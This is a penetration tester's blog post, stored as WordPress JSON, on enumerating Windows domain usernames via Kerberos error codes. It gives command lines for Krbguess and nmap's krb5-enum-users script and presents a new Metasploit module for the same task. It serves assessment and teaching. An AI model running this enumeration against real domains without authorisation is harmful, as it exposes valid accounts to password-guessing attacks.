{"id":311,"date":"2016-11-09T16:45:18","date_gmt":"2016-11-09T16:45:18","guid":{"rendered":"https:\/\/www.attackdebris.com\/?p=311"},"modified":"2017-05-30T21:24:57","modified_gmt":"2017-05-30T20:24:57","slug":"kerberos-domain-username-enumeration","status":"publish","type":"post","link":"https:\/\/www.attackdebris.com\/?p=311","title":{"rendered":"Kerberos Domain Username Enumeration"},"content":{"rendered":"<p><strong>Kerberos Domain Username Enumeration<\/strong><\/p>\n<p>Over recent years enumerating valid operating system level user names from up-to-date and well-maintained Windows environments, even from an internal test perspective, has become increasingly unlikely. Where RID cycling once provided us with a full list of domain users from an unauthenticated perspective, this is generally no longer the case.<\/p>\n<p>However, in relation to internal assessments the Kerberos service (88\/tcp) still provides us with a happy hunting ground in relation to the ability to enumerate domain account names.<\/p>\n<p>Essentially the username enumeration is leveraged via the following Kerberos error codes:<\/p>\n<table width=\"616\">\n<tbody>\n<tr>\n<td width=\"128\"><strong>User Status<\/strong><\/td>\n<td width=\"488\"><strong>Kerberos Error<\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"128\">Present \/ Enabled<\/td>\n<td width=\"488\">KDC_ERR_PREAUTH_REQUIRED &#8211; Additional pre-authentication required<\/td>\n<\/tr>\n<tr>\n<td width=\"128\">Locked \/ Disabled<\/td>\n<td width=\"488\">KDC_ERR_CLIENT_REVOKED &#8211; Clients credentials have been revoked<\/td>\n<\/tr>\n<tr>\n<td width=\"128\">Does not exist<\/td>\n<td width=\"488\">KDC_ERR_C_PRINCIPAL_UNKNOWN &#8211; Client not found in Kerberos database<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p>Several good tools, which have been around for some time, have provided us with the ability to leverage these Kerberos responses to identify valid or invalid domain accounts.<\/p>\n<p>Both of the tools I have been leveraging up until now have both been provided by Patrik Karlsson, the first is the standalone Java tool Krbguess, the second being the krb5-enum-users NSE script for nmap.<\/p>\n<p>&nbsp;<\/p>\n<p><strong><u>Krbguess<\/u><\/strong><\/p>\n<p>Usage:<\/p>\n<p><strong>Java \u2013jar kerbguess.jar \u2013r [domain] \u2013d [user list] \u2013s [DC IP<\/strong>]<\/p>\n<p><a href=\"https:\/\/www.attackdebris.com\/wp-content\/uploads\/2016\/11\/krbguess.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-313\" src=\"https:\/\/www.attackdebris.com\/wp-content\/uploads\/2016\/11\/krbguess.jpg\" alt=\"krbguess\" width=\"1016\" height=\"153\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p><u><strong>Nmap krb5-enum-users NSE Script<\/strong> <\/u><\/p>\n<p>Usage:<\/p>\n<p><strong>Nmap \u2013p 88 &#8211;script-args krb5-enum-users.realm=\u2019[domain]\u2019,userdb=[user list] [DC IP]<\/strong><\/p>\n<p><a href=\"https:\/\/www.attackdebris.com\/wp-content\/uploads\/2016\/11\/nmap_kerberos_enum-1.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-315\" src=\"https:\/\/www.attackdebris.com\/wp-content\/uploads\/2016\/11\/nmap_kerberos_enum-1.jpg\" alt=\"nmap_kerberos_enum\" width=\"1236\" height=\"277\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p><strong><span style=\"text-decoration: underline;\">Metasploit Module: auxiliary\/gather\/kerberos_enumusers<\/span><\/strong><\/p>\n<p>Like most penetration testers I\u2019m a heavy user of the Metasploit Framework and for years have thought I would like to be able to leverage this functionality from within the framework. For whatever reason it never seems to have been implemented, thus I decided to have a go at implementing it.<\/p>\n<p>Leaning heavily on the Kerberos support provided by other Metasploit contributors and using the auxiliary module for ms14_068_kerberos_checksum as a template the process was actually a lot simpler than I had anticipated.<\/p>\n<p>The new Metasploit auxiliary module can be found in the following location:<\/p>\n<p><strong>auxiliary\/gather\/kerberos_enumusers<\/strong><\/p>\n<p><a href=\"https:\/\/www.attackdebris.com\/wp-content\/uploads\/2016\/11\/kerberos_enumusers1.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-316\" src=\"https:\/\/www.attackdebris.com\/wp-content\/uploads\/2016\/11\/kerberos_enumusers1.jpg\" alt=\"kerberos_enumusers1\" width=\"860\" height=\"259\" \/><\/a><\/p>\n<p>As with the previously discussed Kerberos enumeration tools, 3 values need to be provided:<\/p>\n<ol>\n<li>Domain Name (DOMAIN)<\/li>\n<li>Domain Controller IP (RHOST)<\/li>\n<li>User list (USER_FILE)<\/li>\n<\/ol>\n<p><a href=\"https:\/\/www.attackdebris.com\/wp-content\/uploads\/2016\/11\/kerberos_enumusers2.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-317\" src=\"https:\/\/www.attackdebris.com\/wp-content\/uploads\/2016\/11\/kerberos_enumusers2.jpg\" alt=\"kerberos_enumusers2\" width=\"595\" height=\"112\" \/><\/a><\/p>\n<p>The module can now be run to enumerate valid (and disabled\/locked) domain accounts via the Kerberos service:<\/p>\n<p><a href=\"https:\/\/www.attackdebris.com\/wp-content\/uploads\/2016\/11\/kerberos_enumusers3.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-318\" src=\"https:\/\/www.attackdebris.com\/wp-content\/uploads\/2016\/11\/kerberos_enumusers3.jpg\" alt=\"kerberos_enumusers3\" width=\"818\" height=\"491\" \/><\/a><\/p>\n<p>Finally, and thanks to an addition by bwatter-r7 at rapid7, any valid enumerated usernames are stored in the Metasploit database and can be retrieved via the \u2018creds\u2019 command:<\/p>\n<p><a href=\"https:\/\/www.attackdebris.com\/wp-content\/uploads\/2016\/11\/kerberos_enumusers4.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-319\" src=\"https:\/\/www.attackdebris.com\/wp-content\/uploads\/2016\/11\/kerberos_enumusers4.jpg\" alt=\"kerberos_enumusers4\" width=\"768\" height=\"180\" \/><\/a><\/p>\n<p>References:<\/p>\n<p><a href=\"http:\/\/www.cqure.net\/wp\/tools\/password-recovery\/krbguess\/\"><em>http:\/\/www.cqure.net\/wp\/tools\/password-recovery\/krbguess\/<\/em><\/a><\/p>\n<p><a href=\"https:\/\/nmap.org\/nsedoc\/scripts\/krb5-enum-users.html\"><em>https:\/\/nmap.org\/nsedoc\/scripts\/krb5-enum-users.html<\/em><\/a><\/p>\n<p><a href=\"https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/admin\/kerberos\/ms14_068_kerberos_checksum\"><em>https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/admin\/kerberos\/ms14_068_kerberos_checksum<\/em><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Kerberos Domain Username Enumeration Over recent years enumerating valid operating system level user names from up-to-date and well-maintained Windows environments, even from an internal test perspective, has become increasingly unlikely. Where RID cycling once provided us with a full list of domain users from an unauthenticated perspective, this is generally no longer the case. However, &hellip; <\/p>\n<p><a class=\"more-link btn\" href=\"https:\/\/www.attackdebris.com\/?p=311\">Continue reading<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":true,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[1],"tags":[],"class_list":["post-311","post","type-post","status-publish","format-standard","hentry","category-tools","item-wrap"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_shortlink":"https:\/\/wp.me\/p3MDvd-51","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.attackdebris.com\/index.php?rest_route=\/wp\/v2\/posts\/311","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.attackdebris.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.attackdebris.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.attackdebris.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.attackdebris.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=311"}],"version-history":[{"count":7,"href":"https:\/\/www.attackdebris.com\/index.php?rest_route=\/wp\/v2\/posts\/311\/revisions"}],"predecessor-version":[{"id":330,"href":"https:\/\/www.attackdebris.com\/index.php?rest_route=\/wp\/v2\/posts\/311\/revisions\/330"}],"wp:attachment":[{"href":"https:\/\/www.attackdebris.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=311"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.attackdebris.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=311"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.attackdebris.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=311"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}